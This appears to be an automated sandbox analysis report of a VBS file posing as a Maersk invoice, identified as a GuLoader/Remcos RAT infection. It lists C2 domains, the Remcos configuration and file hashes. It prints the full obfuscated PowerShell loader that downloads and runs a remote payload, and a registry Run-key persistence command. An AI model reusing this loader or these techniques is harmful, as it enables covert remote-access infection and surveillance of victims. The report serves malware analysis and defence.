Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    01-07-2024 10:00

General

  • Target

    Maersk_BL_Invoice_Packinglist.vbs

  • Size

    21KB

  • MD5

    1a705e08ebbfa361df84f04cb5f0976e

  • SHA1

    e3091fec2ae95f28824fec928defaa68e63e189f

  • SHA256

    c506ac9a87485ac16f09afa8f732f7a72699c6f5db222cb347cf8291f5c27d0f

  • SHA512

    bd6b937c3ad2805cac2eb18c1011634e8b50a5bdd9f7af1bec7251429a7cac5214e33003a3da9e9d198fa362461a15b7d3a937ca6ee323ca20b1d6b22128958e

  • SSDEEP

    384:mlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwgvNRqeGb3OS:ezSR022X/523S0e8xPPmZMhb

Malware Config

Extracted

Family

remcos

Botnet

Proof007

C2

janbours92harbu02.duckdns.org:3980

janbours92harbu02.duckdns.org:3981

janbours92harbu03.duckdns.org:3980

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    kpburtts.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    jmoughoe-LDOW5Q

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Maersk_BL_Invoice_Packinglist.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Jetjager196 Valrs Splodgy Turer Buttoners Hymeniumnia55 Pseudoethically Mediers131 Hangnests Caprimulgus Indhaling Sjlelivet Psychoclinic perioderne fikey tiaarsdag Oppositionless Rigellaasene Tronprtendenters Vivifier Ggeskals Poner Unaturlighed crinites Jetjager196 Valrs Splodgy Turer Buttoners Hymeniumnia55 Pseudoethically Mediers131 Hangnests Caprimulgus Indhaling Sjlelivet Psychoclinic perioderne fikey tiaarsdag Oppositionless Rigellaasene Tronprtendenters Vivifier Ggeskals Poner Unaturlighed crinites';If (${host}.CurrentCulture) {$Cykelstier++;}Function Grovelled($Slick){$schoolchild=$Slick.Length-$Cykelstier;$Afhstet='SUBsTRI';$Afhstet+='ng';For( $Neurocentrum=1;$Neurocentrum -lt $schoolchild;$Neurocentrum+=2){$Jetjager196+=$Slick.$Afhstet.Invoke( $Neurocentrum, $Cykelstier);}$Jetjager196;}function Hovne35($Arbejdsmetode){ .($Appalachian) ($Arbejdsmetode);}$Muddleheadedness204=Grovelled ' MFo zDi.lSl aA/ 5S. 0K U(AWCiFn dDo w sC UN.T. T1 0U.H0P;S WMi nO6.4T;K Hx 6b4.;U Mr v : 1K2 1H.S0I) UG,edcDkCoI/u2D0B1K0r0,1U0R1 F,i r,eFfaoAx./ 1 2T1,.S0c ';$Paquet=Grovelled 'OUBs eFrU-BASgDeunStC ';$Buttoners=Grovelled ' h tGtgp,:a/V/C1H0N3...1.9H5S.S2 3.7C.,4B3 / W r o,n,gLdTo i.nTgFs,1 9m3,.Ap cAxs ';$Deleting=Grovelled ' >T ';$Appalachian=Grovelled 'GiUePxD ';$Dolke234='Mediers131';$Skinnes = Grovelled ',eMc hSos W%.aKp pUdMa.tSaP%,\BT,r,iPcVoDt iSn.en.HI nStF ,&P&S Me c h oJ BtR ';Hovne35 (Grovelled 'E$SgOl o bCaGl : DbaAn sGe.d e,s =D(AcFm dP /GcL .$MSHkCi n.n e.s ), ');Hovne35 (Grovelled 'i$Og l oBb a,lA:,T u r,eGrR=.$,BUu.tSt.o.n.eFr.s .CsOp l iOtE(T$ D,e.lKe tLiJnUg.)T ');Hovne35 (Grovelled 'I[SNFeFt .ASPeIrFvPi,cCe P,o.iDnpt M a n,aSgSe.rO],: : S.ePc,u,rki t,y PSr.o,t oPcTo.l, I= [SN eUtP..SNeCc.u rPi tHycPTr.oMt oTcOo.l TRy,p,e ]M:.:GTUl s 1R2 ');$Buttoners=$Turer[0];$Semievergreen94= (Grovelled ' $Ug.lPo bEaHlt: F e,rEsvk.vMaPn dDs s.=GNKe w -SOFb j e c t. S.y sCt,eCm .KN.eBt,.PWVeFbOCEl,i,e.nBt');$Semievergreen94+=$Dansedes[1];Hovne35 ($Semievergreen94);Hovne35 (Grovelled ',$RFGe.r s.kBvRa.n d s so.PH e,aRdSeKrBsC[,$FPBa,q u.eItU] =R$TMPuSd,dGl eLhBe aAd.e dSn.eRs sU2L0S4 ');$Haandpanthaver=Grovelled 'T$ F e r.sKk v aLnIdMs,sL.,D o,wPn.l,oPaRd.F i,lRe.(K$PB u.tBt,odn.eHr sD,S$.PBoLnEeOrM) ';$Poner=$Dansedes[0];Hovne35 (Grovelled 's$ gKlUo,b aPl :.CRh,aOf e w,a,xV=F(ST,eSsrt -IP aUtSh. $CPCoTnPeUrA) ');while (!$Chafewax) {Hovne35 (Grovelled ' $Mgul,oFb aRlf:FT,rSi cDh oPp tKeTrEaO1 0P1R=M$ tAr.u,eG ') ;Hovne35 $Haandpanthaver;Hovne35 (Grovelled 'CS,t a rWtH-SSSl,e.eEpN L4 ');Hovne35 (Grovelled 'F$BgDlMo bfaPl :UC hSaAf,eHw aFxS=,(,TAets t.-IP aAtDhR $ P oTn ecr )S ') ;Hovne35 (Grovelled ' $LgLl osbIaTlG:USDp lGo.dNg.y,=A$ g l.o bSaSl :EV,a.lNr s,+L+A%.$FTKujr.eSr . c,o uinRt ') ;$Buttoners=$Turer[$Splodgy];}$skyttegravenes=371185;$Selenographers=25643;Hovne35 (Grovelled ' $ g lSoCbTaDl,: H,acnEg,nGe s,tEsB H=T IGEe t - C.o.n t,e n t D$ P oFnUe r ');Hovne35 (Grovelled '.$Tg,l oKbPa l :.EFn h,a,n,cKe r.sI = ,[US.y.sOtSe,m..SCBoJn v eIr.t,] :A:OFSr oFm BPaSs e 6 4ASjt.rSiPn.gK(S$TH aCnsg,nPeps t s )U ');Hovne35 (Grovelled ' $,g.l,oPb.aPlG:RS jal e lTiGv e.tR .=S S[bSSyUsgtRe.mF.AT eSxDt..MEInsc o d i,nAg,] :F:cADSLCrI I .CGAe.tpSft rLiOnNg,(S$SE.n,h.a n cGeGr.sF). ');Hovne35 (Grovelled ' $FgSlUo b,aIlC:HG lToEb uKsRe rTs = $ SUj l.eKl iHv eRtH.,sju,b,s,t,rCiUnSg,(P$,s.k.y tFtEe gDrDakvRe.nieNsB,M$MS eAl esn oSg,r aCp.hSe rSsC) ');Hovne35 $Globusers;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2684
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tricotine.Int && echo t"
        3⤵
          PID:2872
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Jetjager196 Valrs Splodgy Turer Buttoners Hymeniumnia55 Pseudoethically Mediers131 Hangnests Caprimulgus Indhaling Sjlelivet Psychoclinic perioderne fikey tiaarsdag Oppositionless Rigellaasene Tronprtendenters Vivifier Ggeskals Poner Unaturlighed crinites Jetjager196 Valrs Splodgy Turer Buttoners Hymeniumnia55 Pseudoethically Mediers131 Hangnests Caprimulgus Indhaling Sjlelivet Psychoclinic perioderne fikey tiaarsdag Oppositionless Rigellaasene Tronprtendenters Vivifier Ggeskals Poner Unaturlighed crinites';If (${host}.CurrentCulture) {$Cykelstier++;}Function Grovelled($Slick){$schoolchild=$Slick.Length-$Cykelstier;$Afhstet='SUBsTRI';$Afhstet+='ng';For( $Neurocentrum=1;$Neurocentrum -lt $schoolchild;$Neurocentrum+=2){$Jetjager196+=$Slick.$Afhstet.Invoke( $Neurocentrum, $Cykelstier);}$Jetjager196;}function Hovne35($Arbejdsmetode){ .($Appalachian) ($Arbejdsmetode);}$Muddleheadedness204=Grovelled ' MFo zDi.lSl aA/ 5S. 0K U(AWCiFn dDo w sC UN.T. T1 0U.H0P;S WMi nO6.4T;K Hx 6b4.;U Mr v : 1K2 1H.S0I) UG,edcDkCoI/u2D0B1K0r0,1U0R1 F,i r,eFfaoAx./ 1 2T1,.S0c ';$Paquet=Grovelled 'OUBs eFrU-BASgDeunStC ';$Buttoners=Grovelled ' h tGtgp,:a/V/C1H0N3...1.9H5S.S2 3.7C.,4B3 / W r o,n,gLdTo i.nTgFs,1 9m3,.Ap cAxs ';$Deleting=Grovelled ' >T ';$Appalachian=Grovelled 'GiUePxD ';$Dolke234='Mediers131';$Skinnes = Grovelled ',eMc hSos W%.aKp pUdMa.tSaP%,\BT,r,iPcVoDt iSn.en.HI nStF ,&P&S Me c h oJ BtR ';Hovne35 (Grovelled 'E$SgOl o bCaGl : DbaAn sGe.d e,s =D(AcFm dP /GcL .$MSHkCi n.n e.s ), ');Hovne35 (Grovelled 'i$Og l oBb a,lA:,T u r,eGrR=.$,BUu.tSt.o.n.eFr.s .CsOp l iOtE(T$ D,e.lKe tLiJnUg.)T ');Hovne35 (Grovelled 'I[SNFeFt .ASPeIrFvPi,cCe P,o.iDnpt M a n,aSgSe.rO],: : S.ePc,u,rki t,y PSr.o,t oPcTo.l, I= [SN eUtP..SNeCc.u rPi tHycPTr.oMt oTcOo.l TRy,p,e ]M:.:GTUl s 1R2 ');$Buttoners=$Turer[0];$Semievergreen94= (Grovelled ' $Ug.lPo bEaHlt: F e,rEsvk.vMaPn dDs s.=GNKe w -SOFb j e c t. S.y sCt,eCm .KN.eBt,.PWVeFbOCEl,i,e.nBt');$Semievergreen94+=$Dansedes[1];Hovne35 ($Semievergreen94);Hovne35 (Grovelled ',$RFGe.r s.kBvRa.n d s so.PH e,aRdSeKrBsC[,$FPBa,q u.eItU] =R$TMPuSd,dGl eLhBe aAd.e dSn.eRs sU2L0S4 ');$Haandpanthaver=Grovelled 'T$ F e r.sKk v aLnIdMs,sL.,D o,wPn.l,oPaRd.F i,lRe.(K$PB u.tBt,odn.eHr sD,S$.PBoLnEeOrM) ';$Poner=$Dansedes[0];Hovne35 (Grovelled 's$ gKlUo,b aPl :.CRh,aOf e w,a,xV=F(ST,eSsrt -IP aUtSh. $CPCoTnPeUrA) ');while (!$Chafewax) {Hovne35 (Grovelled ' $Mgul,oFb aRlf:FT,rSi cDh oPp tKeTrEaO1 0P1R=M$ tAr.u,eG ') ;Hovne35 $Haandpanthaver;Hovne35 (Grovelled 'CS,t a rWtH-SSSl,e.eEpN L4 ');Hovne35 (Grovelled 'F$BgDlMo bfaPl :UC hSaAf,eHw aFxS=,(,TAets t.-IP aAtDhR $ P oTn ecr )S ') ;Hovne35 (Grovelled ' $LgLl osbIaTlG:USDp lGo.dNg.y,=A$ g l.o bSaSl :EV,a.lNr s,+L+A%.$FTKujr.eSr . c,o uinRt ') ;$Buttoners=$Turer[$Splodgy];}$skyttegravenes=371185;$Selenographers=25643;Hovne35 (Grovelled ' $ g lSoCbTaDl,: H,acnEg,nGe s,tEsB H=T IGEe t - C.o.n t,e n t D$ P oFnUe r ');Hovne35 (Grovelled '.$Tg,l oKbPa l :.EFn h,a,n,cKe r.sI = ,[US.y.sOtSe,m..SCBoJn v eIr.t,] :A:OFSr oFm BPaSs e 6 4ASjt.rSiPn.gK(S$TH aCnsg,nPeps t s )U ');Hovne35 (Grovelled ' $,g.l,oPb.aPlG:RS jal e lTiGv e.tR .=S S[bSSyUsgtRe.mF.AT eSxDt..MEInsc o d i,nAg,] :F:cADSLCrI I .CGAe.tpSft rLiOnNg,(S$SE.n,h.a n cGeGr.sF). ');Hovne35 (Grovelled ' $FgSlUo b,aIlC:HG lToEb uKsRe rTs = $ SUj l.eKl iHv eRtH.,sju,b,s,t,rCiUnSg,(P$,s.k.y tFtEe gDrDakvRe.nieNsB,M$MS eAl esn oSg,r aCp.hSe rSsC) ');Hovne35 $Globusers;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2788
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tricotine.Int && echo t"
            4⤵
              PID:2612
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2524
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Havnefogedeners160" /t REG_EXPAND_SZ /d "%Idelses% -w 1 $Windsorstolene=(Get-ItemProperty -Path 'HKCU:\Fralandsvinds\').Shadflies;%Idelses% ($Windsorstolene)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2808
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Havnefogedeners160" /t REG_EXPAND_SZ /d "%Idelses% -w 1 $Windsorstolene=(Get-ItemProperty -Path 'HKCU:\Fralandsvinds\').Shadflies;%Idelses% ($Windsorstolene)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2876

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K39XWF2V5X6QHA1843Z5.temp
        Filesize

        7KB

        MD5

        88f040c4af8da70fef7d94e1446c6d8c

        SHA1

        8783fd00ebb6fcfd454161838c89224fc378cb83

        SHA256

        291587a26c9cdb93c4386db776e3b75ba368ca77c988f7015f8dda0d0398ad9f

        SHA512

        1c8f424bb07e5a6607f929d76ea831a306ddd0f72dc3624ad7cf00870dbc412924dd5a8d7f1d004da4a027fce223b3e99f4ac8046ff4a42823526962bdadbc5f

      • C:\Users\Admin\AppData\Roaming\Tricotine.Int
        Filesize

        516KB

        MD5

        a19ac5c628d2cfe0b9f264ef6835a069

        SHA1

        916e42b69efdf9c305a523d39a43dbd0187acb6c

        SHA256

        8cda02eabdc78956055c9b34c2578da73344fbdfa8f65586ed4e90384f85b752

        SHA512

        dc6b71d52a6a164e4e085b0a9457e9512a9bddcf741da2007edc4b3443636bc0ac1a7c6a3445dc1a38b4a26eca99097dec6b7433711f097ff06e8d05321f7b1c

      • memory/2524-22-0x00000000013C0000-0x0000000003E45000-memory.dmp
        Filesize

        42.5MB

      • memory/2524-21-0x0000000000350000-0x00000000013B2000-memory.dmp
        Filesize

        16.4MB

      • memory/2684-10-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp
        Filesize

        9.6MB

      • memory/2684-9-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp
        Filesize

        9.6MB

      • memory/2684-8-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp
        Filesize

        9.6MB

      • memory/2684-11-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp
        Filesize

        9.6MB

      • memory/2684-4-0x000007FEF626E000-0x000007FEF626F000-memory.dmp
        Filesize

        4KB

      • memory/2684-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp
        Filesize

        2.9MB

      • memory/2684-17-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp
        Filesize

        9.6MB

      • memory/2684-18-0x000007FEF626E000-0x000007FEF626F000-memory.dmp
        Filesize

        4KB

      • memory/2684-7-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp
        Filesize

        9.6MB

      • memory/2684-6-0x0000000001E70000-0x0000000001E78000-memory.dmp
        Filesize

        32KB

      • memory/2684-25-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp
        Filesize

        9.6MB

      • memory/2788-19-0x0000000006690000-0x0000000009115000-memory.dmp
        Filesize

        42.5MB